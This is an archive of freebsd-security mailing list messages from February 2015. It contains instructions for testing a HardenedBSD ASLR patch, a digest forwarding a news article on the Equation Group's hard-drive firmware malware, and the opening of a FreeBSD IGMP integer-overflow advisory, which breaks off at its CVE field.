Lf5NsdhDpyio8sBTb/98nj3E/IXoCLpo1+fRZCgeLFB0wq9gvy05qc3SmWyvI8f9A5Ju dpjBrLD2lO5/Tu1U6uRSICiapSH7jHYVGcttwhB3kjGY1PDnbx2My3wqTKGcwG/SZejI 8MA9hxfWzil35ECuc4lc2zi6Q49SQy6sf2HarD9vluP/RYPxQ0fsnkstVzUwRF8jB+2z O0mrgkhVYsQt40cq4GTyHGdChZpfILiC5tFlDpNHDXbDjQH/wbljCDH9fnYHfwTTSgA+ 605g== MIME-Version: 1.0 X-Received: by 10.140.107.75 with SMTP id g69mr34644235qgf.103.1424784619778; Tue, 24 Feb 2015 05:30:19 -0800 (PST) Sender: spankthespam@gmail.com Received: by 10.229.131.204 with HTTP; Tue, 24 Feb 2015 05:30:19 -0800 (PST) In-Reply-To: <2473923.nPpcAzaekg@shawnwebb-laptop> References: <2473923.nPpcAzaekg@shawnwebb-laptop> Date: Tue, 24 Feb 2015 13:30:19 +0000 X-Google-Sender-Auth: 28IjDAXj6DVpGX2lVhYLt2erlyA Message-ID: Subject: Re: CFT: New ASLR Patch From: Bartek Rutkowski To: Shawn Webb Content-Type: text/plain; charset=UTF-8 Cc: "freebsd-security@freebsd.org" X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 24 Feb 2015 13:30:21 -0000 On Sat, Feb 21, 2015 at 3:59 PM, Shawn Webb wrote: > Hey All, > > It has been a long time since we sent out a call for testing request for our > ASLR patch. We've been hard at work making our ASLR implementation as robust > as possible. We'd like to invite all adventurous souls to test our ASLR > implementation. Put it through the ringer. > > Since the patch is much too large to attach to an email, you can find our > latest patch on FreeBSD's Phabricator: > > https://reviews.freebsd.org/D473 > > Or download the raw version of the patch: > https://reviews.freebsd.org/D473?download=true > > Please let me know if you find any issues. > > Thanks, > > Shawn Webb > HardenedBSD Hi, First of all, thanks a lot for your work on that, cant wait to see it implemented in FreeBSD release! Could you perhaps update your call for testing with some instructions for potential testers as to how to test (I assume this patch is agains -CURRENT, but I could be wrong here, and other could make different assumptions), is there anything else than applying patches, compilation and reboot required (any configuration?), what to look at when running on these patches, what are you interested in when reporting any success/issues with them (any instructions for generating a relevant problem report for you?) and so on? Kind regards, Bartek Rutkowski From owner-freebsd-security@FreeBSD.ORG Tue Feb 24 13:37:52 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 8014BEAD for ; Tue, 24 Feb 2015 13:37:52 +0000 (UTC) Received: from mail-qg0-f52.google.com (mail-qg0-f52.google.com [209.85.192.52]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 35A08A3E for ; Tue, 24 Feb 2015 13:37:51 +0000 (UTC) Received: by mail-qg0-f52.google.com with SMTP id h3so29721518qgf.11 for ; Tue, 24 Feb 2015 05:37:45 -0800 (PST) X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:from:to:cc:subject:date:message-id:organization :user-agent:in-reply-to:references:mime-version:content-type; bh=bVHSys98oywng1Kza4Ymk8D1H3XojGhbFnFFZPkxZFw=; b=Bl3sdZ5w9hw+/9JOquZnu2MfiKuyx4RiCwW1eQk+zoChqWL+YlWI6yZBcgikLBpZtX LZnrEv4ikNo/+NJxMlj24iEdgifEaj7qgoyJGfCe+iC7OiVSq5nrl4CTExM/HG5O7lz0 Q9RUbPj6bIu5EAtZPtiHv9y4ozC7wmQ596kDdf1cVrv5lR32B5Db5uiggXpNNlnHkR6b zsBtRAkk/1Y9Y8FYpJ6+hGCBPaB3qmZFZpm+CqdQsoM188BULPbO+DDKyC3cfpamYtl5 AYICFv+OaGw7dAUT9xMfK659cElVj5JIwO4CnXxtdMNMShJ3W0JFecvnAWiIPdmO0Wqi uLjg== X-Gm-Message-State: ALoCoQk2jtZ79vJB5pX2IFZMdP01aBlKJeDqN4g+ubzCPVFCiwYARxvae9iTmDaGN5qB3bl0YgXy X-Received: by 10.140.217.200 with SMTP id n191mr36280062qhb.29.1424785065106; Tue, 24 Feb 2015 05:37:45 -0800 (PST) Received: from shawn-work-laptop.localnet ([2001:470:e4fc:1::1017]) by mx.google.com with ESMTPSA id 201sm3714838qhd.11.2015.02.24.05.37.43 (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Tue, 24 Feb 2015 05:37:44 -0800 (PST) From: Shawn Webb To: Bartek Rutkowski Subject: Re: CFT: New ASLR Patch Date: Tue, 24 Feb 2015 08:37:39 -0500 Message-ID: <12077700.SpcsIGnYmK@shawn-work-laptop> Organization: HardenedBSD User-Agent: KMail/4.14.1 (Linux/3.16.0-30-generic; KDE/4.14.1; x86_64; ; ) In-Reply-To: References: <2473923.nPpcAzaekg@shawnwebb-laptop> MIME-Version: 1.0 Content-Type: multipart/signed; boundary="nextPart1478183.sokRFSvpuu"; micalg="pgp-sha1"; protocol="application/pgp-signature" Cc: "freebsd-security@freebsd.org" X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 24 Feb 2015 13:37:52 -0000 --nextPart1478183.sokRFSvpuu Content-Transfer-Encoding: 7Bit Content-Type: text/plain; charset="us-ascii" On Tuesday, February 24, 2015 01:30:19 PM Bartek Rutkowski wrote: > On Sat, Feb 21, 2015 at 3:59 PM, Shawn Webb wrote: > > Hey All, > > > > It has been a long time since we sent out a call for testing request for > > our ASLR patch. We've been hard at work making our ASLR implementation as > > robust as possible. We'd like to invite all adventurous souls to test our > > ASLR implementation. Put it through the ringer. > > > > Since the patch is much too large to attach to an email, you can find our > > latest patch on FreeBSD's Phabricator: > > > > https://reviews.freebsd.org/D473 > > > > Or download the raw version of the patch: > > https://reviews.freebsd.org/D473?download=true > > > > Please let me know if you find any issues. > > > > Thanks, > > > > Shawn Webb > > HardenedBSD > > Hi, > > First of all, thanks a lot for your work on that, cant wait to see it > implemented in FreeBSD release! > > Could you perhaps update your call for testing with some instructions > for potential testers as to how to test (I assume this patch is agains > -CURRENT, but I could be wrong here, and other could make different > assumptions), is there anything else than applying patches, > compilation and reboot required (any configuration?), what to look at > when running on these patches, what are you interested in when > reporting any success/issues with them (any instructions for > generating a relevant problem report for you?) and so on? > > Kind regards, > Bartek Rutkowski Hey Bartek, Great questions which I should have answered in my original email. The patch is against HEAD (11-CURRENT). Here's how you can test it: 1) Download the patch 2) cd /usr/src && patch -p1 < /path/to/downloaded/patch 3) vim sys/amd64/conf/GENERIC 3.1) Find the line that has "#options PAX_ASLR" and uncomment it 3.2) Optionally uncomment the PAX_SYSCTLS kernel option as well 4) Build world and kernel 5) Install world and kernel 6) Reboot 7) Sit back, relax, and enjoy life Since FreeBSD's base doesn't support being compiled as Position-Independent Executables (PIEs), ASLR is only semi-applied. The base address of shared objects and anonymous mappings get randomized along with the stack. The base address of the executable itself does not. If FreeBSD had support for compiling base as PIEs, then you would see ASLR fully applied, including the base address of the application. Ideally, you should see no breakage in applications. Our implementation does provide per-jail granularity. So if an application does break with ASLR applied, you can simply run that application in a jail where ASLR is disabled for that jail only. You will need the PAX_SYSCTLS kernel option in this case. Thanks, Shawn --nextPart1478183.sokRFSvpuu Content-Type: application/pgp-signature; name="signature.asc" Content-Description: This is a digitally signed message part. Content-Transfer-Encoding: 7Bit -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQIcBAABAgAGBQJU7H6mAAoJEGqEZY9SRW7ugpUQAKurQ+Ixoo8jKlQV/CNpUSwC WnVUqPN8lmu7sWhA2CI5X3/jt7vPCW63tPD6sCwomppmVBmCrtaXgh+HGdhorJ3f FAcjdCvyHt5h2s7t8CYJ66iGgYEPX0gxE7E0ve1Rp1EvVhwSxeLEfXDtjcXskgA4 Og0mDIzWLO3BOh7haRPWNjyY2SntP9po+p8LDGlSVeMAlw8j9b/BKR0xgjYJ6SMn ZC9DISrT9kKXJeqP9mp3DZZbCJv61a7sZPQ+/MQ/99qyknRgprl4aywaiz1Blofn +xcDjYvzg68Fy/ycKZx9e2+35U5gOCiVwlMfrl1xFuTE5V6nNmUZ902x3au0Xul5 +dedpr0biSz3JXMAcX0IppqaT5sF7DoxilMIMvOqips0jO+u667CSxbgNCUszf65 U4/jiTBlOS90NYgAQj/XSajIPIvCW3oopajFuDcpjPLLGtzuhwagcUGOasbqniXD ri+Umz47YOfUVXCEJ/vKYur/llQ0XKrjy3xLlmpRzrMVG6u8YPXJRu4ZQYvlMJSz 1KI2PYfeLN+QzsTAu1yMDIEdckhrgM0vEatI7em47QtBKHZnF3U6yoz+HY2ZpOjG rHc82fx/BP7ShXSboKpYb8U3ynvvNnNWoORbKzK2T1IHGOjEZ7T6FRU2AKCb9YUy +t073U+O5q8mdNkeOqw1 =NOKE -----END PGP SIGNATURE----- --nextPart1478183.sokRFSvpuu-- From owner-freebsd-security@FreeBSD.ORG Tue Feb 24 15:52:26 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 929F0AE1 for ; Tue, 24 Feb 2015 15:52:26 +0000 (UTC) Received: from nm16-vm4.bullet.mail.ir2.yahoo.com (nm16-vm4.bullet.mail.ir2.yahoo.com [212.82.96.210]) (using TLSv1 with cipher ECDHE-RSA-RC4-SHA (128/128 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id A09CAD02 for ; Tue, 24 Feb 2015 15:52:24 +0000 (UTC) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.co.uk; s=s2048; t=1424792930; bh=HWVFWJZNRuuFf+yfnjzgU8FqoH4ynE1GI0tjv84BNrs=; h=Date:From:Reply-To:To:In-Reply-To:References:Subject:From:Subject; b=XBwoFOS1+gVxJhtrbNRQYradSQPcPPrsGlUPGBybogJEethO8AxY1H9zeyCq3s7ut0/gzSv4p8r4Klf5mluzY+ZPjRSmawp4LPXmMFzCxJDw7Jldb4iEpVe7yLVlNGxJxEf7uc5PD3apdW3AiFJi6uDhTXRQF4crE+e8sHEpxUTiSZUlvJz7E7Wc2COSA+73g/tW3FpUQGR5Wgh+l9lyOeNqm4uBLBM8P8Mors5lQCciM8flwzPZrQF+PgpkUPpcvtjdviX/9RHYifyi/zp70JnrJu3OwgqTn+uBgkXrSIskpwdqy4U94mwPbNz2I0hS7Ca9ZdnBYyLqj0aHBfHsuA== Received: from [212.82.98.127] by nm16.bullet.mail.ir2.yahoo.com with NNFMP; 24 Feb 2015 15:48:50 -0000 Received: from [212.82.98.103] by tm20.bullet.mail.ir2.yahoo.com with NNFMP; 24 Feb 2015 15:48:50 -0000 Received: from [127.0.0.1] by omp1040.mail.ir2.yahoo.com with NNFMP; 24 Feb 2015 15:48:50 -0000 X-Yahoo-Newman-Property: ymail-3 X-Yahoo-Newman-Id: 830158.76666.bm@omp1040.mail.ir2.yahoo.com X-YMail-OSG: Dc.R_90VM1katNtENFwfDRrHbYECePETcEUqtmNEeYfwdRPuhJmllJsXdIOyit7 VYkwnSlgKzJndlzHLyCI7Dgnhj3dTE1FxTC0.y7AAMnZ20CF00UZqheiJRQbLt3vYljtXTSQjIZ5 CuQib6GuqLlaqXwnGrDjiaJFH2BpnFMsNMPyIsWk9fNlilJzVXof1d3rwgQAV2Cxn_a1BIl7MljX 3j0qMgSULy6pl089IRVkx3YV_rSHqIsWcQXjSDXZuegqA6AtmlkQId35IoTGJyCheXQ6RAqdniAq zX4Z9.D0PNyse7tOc0Hwbdm2sCha5cDeQupyyq7Y.dQTs_qfAIPb_Q5_hOsR3EIH0iIgOgfk3nSw RD7XdgtDt4DT481WzExDLKxSOBBRgJRu3uj17s2kv16Gq1eoahEjWIgDWXNmlYoDKi1Oh5N8Yo4M vz5neINdTUs8NMDXdD0hnWtHPTkWhALuT_0JGTeECLgufme8mCmY8OsXu..VjijFE_EEgQPxO6CK _CgY7_LE9RS9IaMvAmV8Di3uVhHB7hdFNfJrW7E4V93.NIkzUe6bPK2D6yTn.tcgzUGpRr8P_zLM 3V8dGiOgOOBQQixlQ3f.fIPQgLfFbIJajCZA.2YTNQCGig7nCUPeikermf3sR9uBg_WVykC6J6GN 1ZFjWAyY3yNNByuXgaK0Mm.oGvm30C6dUyOgkJWaTAA8o_XT38sF1wklCd1MWiZ66lryxnUn_zmk cqYcVAa7tWWDeeocljaS4uFoHuNsUUh33fLrBNQhUEvc5jHzptsByt.GPQxGZKPw19n6Hz97z7i. 0BqBdpDQyrIzGULkxZQqObaoGhvgZ4uHj8JJQMq9epGFQzxs4gNzH.nC_9N8ukRanItabsLaZ0zu fS_RnUf0zBo0MEs0ig.Wf8SMFhGtkbxkrqS5AQ0HEOwn. Received: by 217.12.8.245; Tue, 24 Feb 2015 15:48:49 +0000 Date: Tue, 24 Feb 2015 15:48:49 +0000 (UTC) From: Kay Rydyger Reply-To: Kay Rydyger To: "freebsd-security@freebsd.org" Message-ID: <497719404.10532369.1424792929103.JavaMail.yahoo@mail.yahoo.com> In-Reply-To: References: Subject: Re: freebsd-security Digest, Vol 523, Issue 2 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.18-1 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 24 Feb 2015 15:52:26 -0000 From: "freebsd-security-request@freebsd.org" To: freebsd-security@freebsd.org=20 Sent: Tuesday, 24 February 2015, 13:00 Subject: freebsd-security Digest, Vol 523, Issue 2 =20 Send freebsd-security mailing list submissions to =C2=A0=C2=A0=C2=A0 freebsd-security@freebsd.org To subscribe or unsubscribe via the World Wide Web, visit =C2=A0=C2=A0=C2=A0 http://lists.freebsd.org/mailman/listinfo/freebsd-securi= ty or, via email, send a message with subject or body 'help' to =C2=A0=C2=A0=C2=A0 freebsd-security-request@freebsd.org You can reach the person managing the list at =C2=A0=C2=A0=C2=A0 freebsd-security-owner@freebsd.org When replying, please edit your Subject line so it is more specific than "Re: Contents of freebsd-security digest..." Today's Topics: =C2=A0 1. Re: [Cryptography] trojans in the firmware (Tom Mitchell) =C2=A0 2. Fwd: [Cryptography] trojans in the firmware (grarpamp) ---------------------------------------------------------------------- Message: 1 Date: Sun, 22 Feb 2015 20:48:15 -0800 From: Tom Mitchell To: Peter Gutmann Cc: cpunks , freebsd-security@freebsd.org, =C2=A0=C2=A0=C2=A0 "cryptography@metzdowd.com" ,= grarpamp =C2=A0=C2=A0=C2=A0 , Henry Baker Subject: Re: [Cryptography] trojans in the firmware Message-ID: =C2=A0=C2=A0=C2=A0 Content-Type: text/plain; charset=3DUTF-8 On Sun, Feb 22, 2015 at 3:45 PM, Peter Gutmann wrote: > Henry Baker writes: > > >BTW, what's the point of AES encryption on this pre-p0wned device?=C2=A0= More > >security theatre? > > Almost.=C2=A0 Its sole use is for very fast "drive erasure", i.e. you cha= nge the > key and the data on it becomes inaccessible.=C2=A0 Have a look > Yes... In addition it can be of value for a remote wipe. This is interesting with phone home software that then discovers it has been reported lost.=C2=A0 A small handshake and one company might duck having to report a massive data breach. The single largest value is the release of devices that once lived in an interesting location and needs to be transported to a destruction location.=C2=A0 =C2=A0 Perhaps not national secrets but Amazon or Google co= mpute center.. or pharma... or medical records.=C2=A0 =C2=A0 More valuable to RAI= D vendors than customers of RAID vendors as it can be used to limit vendor liability as they replace one rack with a new one and have to manage the trash. Someone once commented to me that NSA and TLAs like milling machines and the curie point of media. All must transport the device to be trashed. Some individuals in the early steps of the custody chain might like a quick wipe method. Some should mention the terrible handling of disks in copy machines. This could help in the decommission or service process but does not solve bankruptcy induced problems. --=20 =C2=A0 T o m=C2=A0 =C2=A0 M i t c h e l l ------------------------------ Message: 2 Date: Mon, 23 Feb 2015 18:09:59 -0500 From: grarpamp To: cypherpunks@cpunks.org Cc: freebsd-security@freebsd.org, freebsd-questions@freebsd.org Subject: Fwd: [Cryptography] trojans in the firmware Message-ID: =C2=A0=C2=A0=C2=A0 Content-Type: text/plain; charset=3DUTF-8 > http://www.recover.co.il/SA-cover/SA-cover.pdfCiteNPLDOCS Since the firmware rules over everything, all the spare sectors for block reallocation must be considered too, not just the service areas. Then there is the per sector CRC space that could perhaps be reutilized if CRC is implemented as software function. sorry, do not understand. What ?The question was, how to protect against "s= pies" in the hard drive controller, reading user data on the hard disk.The = answer, is, and I am not citing spiegel online here for good reason (......= ).....*, to encrypt data prior to sending to hard drive.=20 This is possible with GELI. There is no threat to freebsd when you are usin= g the tools given (proper implementation assumed). Weaknesses of this measure are remote and highly costly for the attacker. I= f one is such a person of interest triggering agencies to invest in this, y= ou can be sure, there are more cost effective ways to get them what they wa= nt, and in this case, a more thorough threat analysis would be advisable an= yway. Kernel options to permit only your approved list of opcodes and block all else by default would seem useful to have. > http://www.spiegel.de/media/media-35661.pdfCiteNPLDOCS Again, look at the list of Unix operating systems and file systems.These gu= ys are calling Unix out by name, and soon the common script kid will be too. Unix is under attack and this stuff can't be ignored as "too rare and/or hard and/or low market share to be relavent" anymore. ---------- Forwarded message ---------- Date: Mon, Feb 23, 2015 at 12:10 PM Subject: Re: [Cryptography] trojans in the firmware FYI -- CMU has been hacking disk drive firmware since the 1990's for "smart disks" and "performance"; UCSD has been hacking flash drive firmware more recently.=C2=A0 I believe that DARPA has also openly solicited for disk drive/flash drive firmware hacking capabilities. Both CMU & UCSD are hotbeds of NSA recruitment activity. We now know that in NSA parlance "smart" anything =3D "spying" anything; e.g., "smart disks" =3D "spying disks"; "smart phones" =3D "spying phones", etc. BTW, hiding stuff in a flash memory stick is even easier than in a hard drive.=C2=A0 This is because flash memory is so unreliable, that there is typically a huge percentage of unused space; the cheaper the flash memory, the smaller the fraction of usable reliable memory space.=C2=A0 So it wouldn't be at all surprising to find that your 32GB flash drive is really constructed from 64GB chips, and that 50% of the device is unavailable for use.=C2=A0 It is highly unlikely that _all_ of this unused space is unreliable, so this leaves plenty of room for NSA lurking. But even if the device were 100% reliable, noticing that only 50% was actually in use would be unremarkable, given the typical degree of unreliability of these types of devices. For these reasons, it is critical for flash memory devices to _open up_ their API's, so that the raw memory (with all of its warts) can be inspected and verified. http://www.wired.com/2015/02/nsa-firmware-hacking/ How the NSA?s Firmware Hacking Works and Why It?s So Unsettling By Kim Zetter 02.22.15 8:09 pm One of the most shocking parts of the recently discovered spying network Equation Group is its mysterious module designed to reprogram or reflash a computer hard drive?s firmware with malicious code.=C2=A0 The Kaspersky researchers who uncovered this said its ability to subvert hard drive firmware?-the guts of any computer?-?surpasses anything else? they had ever seen. The hacking tool, believed to be a product of the NSA, is significant because subverting the firmware gives the attackers God-like control of the system in a way that is stealthy and persistent even through software updates.=C2=A0 The module, named ?nls_933w.dll?, is the first of its kind found in the wild and is used with both the EquationDrug and GrayFish spy platforms Kaspersky uncovered. It also has another capability: to create invisible storage space on the hard drive to hide data stolen from the system so the attackers can retrieve it later.=C2=A0 This lets spies like the Equation Group bypass disk encryption by secreting documents they want to seize in areas that don?t get encrypted. Kaspersky has so far uncovered 500 victims of the Equation Group, but only five of these had the firmware-flashing module on their systems. The flasher module is likely reserved for significant systems that present special surveillance challenges.=C2=A0 Costin Raiu, director of Kaspersky?s Global Research and Analysis Team, believes these are high-value computers that are not connected to the internet and are protected with disk encryption. Here?s what we know about the firmware-flashing module. How It Works Hard drive disks have a controller, essentially a mini-computer, that includes a memory chip or flash ROM where the firmware code for operating the hard drive resides. When a machine is infected with EquationDrug or GrayFish, the firmware flasher module gets deposited onto the system and reaches out to a command server to obtain payload code that it then flashes to the firmware, replacing the existing firmware with a malicious one.=C2=A0 The researchers uncovered two versions of the flasher module: one that appears to have been compiled in 2010 and is used with EquatinoDrug and one with a 2013 compilation date that is used with GrayFish. The Trojanized firmware lets attackers stay on the system even through software updates.=C2=A0 If a victim, thinking his or her computer is infected, wipes the computer?s operating system and reinstalls it to eliminate any malicious code, the malicious firmware code remains untouched.=C2=A0 It can then reach out to the command server to restore all of the other malicious components that got wiped from the system. Even if the firmware itself is updated with a new vendor release, the malicious firmware code may still persist because some firmware updates replace only parts of the firmware, meaning the malicious portions may not get overwritten with the update.=C2=A0 The only solution for victims is to trash their hard drive and start over with a new one. The attack works because firmware was never designed with security in mind.=C2=A0 Hard disk makers don?t cryptographically sign the firmware they install on drives the way software vendors do.=C2=A0 Nor do hard drive disk designs have authentication built in to check for signed firmware. This makes it possible for someone to change the firmware.=C2=A0 And firmware is the perfect place to conceal malware because antivirus scanners don?t examine it.=C2=A0 There?s also no easy way for users to read the firmware and manually check if it?s been altered. The firmware flasher module can reprogram the firmware of more than a dozen different hard drive brands, including IBM, Seagate, Western Digital, and Toshiba. ?You know how much effort it takes to land just one firmware for a hard drive?=C2=A0 You need to know specifications, the CPU, the architecture of the firmware, how it works,? Raiu says.=C2=A0 The Kaspersky researchers have called it ?an astonishing technical accomplishment and is testament to the group?s abilities.? Once the firmware is replaced with the Trojanized version, the flasher module creates an API that can communicate with other malicious modules on the system and also access hidden sectors of the disk where the attackers want to conceal data they intend to steal.=C2=A0 They hide this data in the so-called service area of the hard drive disk where the hard disk stores data needed for its internal operation. Hidden Storage Is the Holy Grail The revelation that the firmware hack helps store data the attackers want to steal didn?t get much play when the story broke last week, but it?s the most significant part of the hack.=C2=A0 It also raises a number of questions about how exactly the attackers are pulling this off. Without an actual copy of the firmware payload that gets flashed to infected systems, there?s still a lot that?s unknown about the attack, but some of it can be surmised. The ROM chip that contains the firmware includes a small amount of storage that goes unused.=C2=A0 If the ROM chip is 2 megabytes, the firmware might take up just 1.5 megabytes, leaving half a megabyte of unused space that can be employed for hiding data the attackers want to steal. This is particularly useful if the computer has disk encryption enabled.=C2=A0 Because the EquationDrug and GrayFish malware run in Windows, they can grab a copy of documents while they?re unencrypted and save them to this hidden area on the machine that doesn?t get encrypted.=C2=A0 There isn?t much space on the chip for a lot of data or documents, however, so the attackers can also just store something equally as valuable to bypass encryption. ?Taking into account the fact that their GrayFish implant is active from the very boot of the system, they have the ability to capture the encryption password and save it into this hidden area,? Raiu says. Authorities could later grab the computer, perhaps through border interdiction or something the NSA calls ?customs opportunities,? and extract the password from this hidden area to unlock the encrypted disk. http://cryptome.org/2014/05/nsa-customs.htm Raiu thinks the intended targets of such a scheme are limited to machines that are not connected to the internet and have encrypted hard drives. One of the five machines they found hit with the firmware flasher module had no internet connection and was used for special secure communications. ?[The owners] only use it in some very specific cases where there is no other way around it,? Raiu says.=C2=A0 ?Think about Bin Laden who lived in the desert in an isolated compound?-doesn?t have internet and no electronic footprint.=C2=A0 So if you want information from his computer how do you get it?=C2=A0 You get documents into the hidden area and you wait, and then after one or two years you come back and steal it.=C2=A0 The benefits [of using this] are very specific.? Raiu thinks, however, that the attackers have a grander scheme in mind.=C2=A0 ?In the future probably they want to take it to the next level where they just copy all the documents [into the hidden area] instead of the password.=C2=A0 [Then] at some point, when they have an opportunity to have physical access to the system, they can then access that hidden area and get the unencrypted docs.? They wouldn?t need the password if they could copy an entire directory from the operating system to the hidden sector for accessing later. But the flash chip where the firmware resides is too small for large amounts of data.=C2=A0 So the attackers would need a bigger hidden space for storage.=C2=A0 Luckily for them, it exists.=C2=A0 There are large secto= rs in the service area of the hard drive disk that are also unused and could be commandeered to store a large cache of documents, even ones that might have been deleted from other parts of the computer.=C2=A0 This service area, also called the reserved are or system area, stores the firmware and other data needed to operate drives, but it also contains large portions of unused space. An interesting paper (.pdf) published in February 2013 by Ariel Berkman, a data recovery specialist at the Israeli firm Recover, noted ?not only that these areas can?t be sanitized (via standard tools), they cannot be accessed via anti-virus software [or] computer forensics tools.? http://www.recover.co.il/SA-cover/SA-cover.pdf Berkman points out that one particular model of Western Digital drives has 141 MB reserved for the service area, but only uses 12 MB of this, leaving the rest free for stealth storage. To write or copy data to service area requires special commands that are specific to each vendor and are not publicly documented, so an attacker would need to uncover what these are.=C2=A0 But once they do, ?[b]y sending Vendor Specific Commands (VSCs) directly to the hard-drive, one can manipulate these [service] areas to read and write data that are otherwise inaccessible,? Berkman writes.=C2=A0 It is also possible, though not trivial, to write a program to automatically copy documents to this area.=C2=A0 Berkman himself wrote a proof-of-concept program to read and write a file of up to 94 MB to the service area, but the program was a bit unstable and he noted that it could cause some data loss or cause the hard drive to fail. One problem with hiding large amounts of data like this, however, is that its presence might be detected by examining the size of the used space in the service area.=C2=A0 If there should be 129 MB of unused space in this sector but there?s only 80 MB, it?s a dead giveaway that something is there that shouldn?t be.=C2=A0 But a leaked NSA document that was written in 2006 but was published by Der Spiegel last month suggests the spy agency might have resolved this particular problem. NSA Interns to the Rescue The document (.pdf) is essentially a wish list of future spy capabilities the NSA hoped to develop for its so-called Persistence Division, a division that has an attack team within it that focuses on establishing and maintaining persistence on compromised machines by subverting their firmware, BIOS, BUS or drivers.=C2=A0 The document lists a number of projects the NSA put together for interns to tackle on behalf of this attack team.=C2=A0 Among them is the ?Covert Storage? project for developing a hard drive firmware implant that can prevent covert storage on disks from being detected.=C2=A0 To do this, the implant prevents the system from disclosing the true amount of free space available on the disk. http://www.spiegel.de/media/media-35661.pdf ?The idea would be to modify the firmware of a particular hard drive so that it normally only recognizes, say, half of its available space,? the document reads.=C2=A0 ?It would report this size back to the operating system and not provide any way to access the additional space.?=C2=A0 Only one partition of the drive would be visible on the partition table, leaving the other partitions?-where the hidden data was stored?-invisible and inaccessible. The modified firmware would have a special hook embedded in it that would unlock this hidden storage space only after a custom command was sent to the drive and the computer was rebooted.=C2=A0 The hidden partition would then be available on the partition table and accessible until the secret storage was locked again with another custom command. How exactly the spy agency planned to retrieve the hidden data was unclear from the eight-year-old document.=C2=A0 Also unclear is whether the interns ever produced a firmware implant that accomplished what the NSA sought.=C2=A0 But given that the document includes a note that interns would be expected to produce a solution for their project within six months after assignment, and considering the proven ingenuity of the NSA in other matters, they no doubt figured it out. _______________________________________________ ------------------------------ Subject: Digest Footer _______________________________________________ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" ------------------------------ End of freebsd-security Digest, Vol 523, Issue 2 ************************************************ From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 06:29:25 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 490B5A75; Wed, 25 Feb 2015 06:29:25 +0000 (UTC) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:1900:2254:206c::16:87]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 2BAC2C51; Wed, 25 Feb 2015 06:29:25 +0000 (UTC) Received: from freefall.freebsd.org (localhost [127.0.0.1]) by freefall.freebsd.org (8.14.9/8.14.9) with ESMTP id t1P6TPf6007868; Wed, 25 Feb 2015 06:29:25 GMT (envelope-from security-advisories@freebsd.org) Received: (from delphij@localhost) by freefall.freebsd.org (8.14.9/8.14.9/Submit) id t1P6TPnA007866; Wed, 25 Feb 2015 06:29:25 GMT (envelope-from security-advisories@freebsd.org) Date: Wed, 25 Feb 2015 06:29:25 GMT Message-Id: <201502250629.t1P6TPnA007866@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: delphij set sender to security-advisories@freebsd.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp Reply-To: freebsd-security@freebsd.org Precedence: bulk X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 06:29:25 -0000 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= FreeBSD-SA-15:04.igmp Security Advisory The FreeBSD Project Topic: Integer overflow in IGMP protocol Category: core Module: igmp Announced: 2015-02-25 Credits: Mateusz Kocielski, Logicaltrust, Marek Kroemeke, and 22733db72ab3ed94b5f8a1ffcde850251fe6f466 Affects: All supported versions of FreeBSD. Corrected: 2015-02-25 05:43:02 UTC (stable/10, 10.1-STABLE) 2015-02-25 05:56:16 UTC (releng/10.1, 10.1-RELEASE-p6) 2015-02-25 05:56:16 UTC (releng/10.0, 10.0-RELEASE-p18) 2015-02-25 05:43:02 UTC (stable/9, 9.3-STABLE) 2015-02-25 05:56:54 UTC (releng/9.3, 9.3-RELEASE-p10) 2015-02-25 05:43:02 UTC (stable/8, 8.4-STABLE) 2015-02-25 05:56:54 UTC (releng/8.4, 8.4-RELEASE-p24) CVE Name: 